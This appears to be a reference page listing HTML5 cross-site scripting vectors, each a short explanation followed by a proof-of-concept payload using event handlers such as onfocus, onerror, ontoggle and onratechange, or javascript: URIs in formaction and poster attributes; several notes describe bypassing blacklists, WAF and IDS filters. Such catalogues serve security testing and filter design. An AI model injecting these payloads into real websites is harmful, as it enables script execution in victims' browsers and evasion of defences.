HTML5 Vectors

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form.

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

This vector uses an input element with autofocus to call its own focus event handler - no user interaction required

<input onfocus=write(1) autofocus>

Here we have two HTML input elements competing for the focus - and one executing JavaScript on losing its focus

<input onblur=write(1) autofocus><input autofocus>

Opera 10.5+ allows using poster attributes in combination with javascript: URIs. This bug has been fixed in Opera 11.

<video poster=javascript:alert(1)//></video>

This vector triggers an onscroll event executing JavaScript on <BODY> due to an autofocus on an <INPUT> way further down the page.

<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.

<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>

Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags

<video><source onerror="alert(1)">

Firefox 3.5+ allows error handlers in <VIDEO> tags when applied with a <SOURCE> tag. The same works for <AUDIO> tags.

<video onerror="alert(1)"><source></source></video>

A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.

<form><button formaction="javascript:alert(1)">X</button>

All browsers besides Internet Explorer 9↓ support the "oninput" event handler around form elements like the given <INPUT>. The event works for the form elements itself, the surrounding form and <BODY> as well as <HTML> tags.

<body oninput=alert(1)><input autofocus>

The <DETAILS> element fires an "ontoggle" event without user interaction on modern Blink-based browsers. This can be abused to bypass blacklists as the event-tag combination is not very well known.
<details open ontoggle="alert(1)">

The <VIDEO> element fires an "onratechange" event without user interaction on Firefox, even if no actual value for the "src" attribute is given. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is rather uncommon and unknown.

<video src onratechange="alert(1)">

1 comment: